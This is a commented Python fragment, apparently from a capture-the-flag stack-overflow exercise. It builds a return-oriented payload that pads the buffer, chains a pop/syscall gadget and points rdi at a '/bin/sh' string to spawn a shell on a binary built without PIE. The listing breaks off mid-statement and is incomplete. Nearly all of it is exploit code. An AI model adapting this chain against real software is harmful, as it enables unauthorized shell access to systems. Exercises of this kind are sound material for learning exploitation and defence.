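# Payload construction for a stack-overflow exercise (pwntools-style fragment).
# `p64` and `cyclic` are used but not imported in this listing; they are
# presumably pwntools helpers brought in by a line that is not shown.
# The chain depends on hard-coded absolute addresses, so it presumably targets
# a binary built without PIE. Position-independent code with ASLR, or a stack
# canary in front of the saved return address, would each invalidate it as written.

# Number of bytes needed for the overflow (length of the padding below).
offet = 40

# Address of str1, found in IDA; stored already packed as a 64-bit value.
bss = p64(0x404080)

# Gadget address. Going by its name: pop rdx; pop rsi; pop rdi; syscall.
pop_rdx_rsi_rdi_syscall = 0x401197

# Original comment: "used to terminate this string".
# NOTE(review): no terminator byte is visible in this listing - confirm
# against the original post.
shellcode = b'/bin/sh'

# Junk data that fills the buffer.
payload = cyclic(offet)

# Gadget address followed by the three values it pops: 0, 0, then the str1
# address, which ends up in rdi.
# Fixed: the original line referenced `pop__rdx_rsi_rdi_syscall` (double
# underscore), a name that is never defined, so it raised NameError.
# Fixed: `bss` is already packed above, so it is appended directly instead of
# being passed through p64() a second time (p64 expects an integer).
payload += p64(pop_rdx_rsi_rdi_syscall) + p64(0) + p64(0) + bss

# The listing is cut off inside the next statement. It is kept verbatim as a
# comment and not reconstructed:
# payload2=b'/bin/sh'+b'...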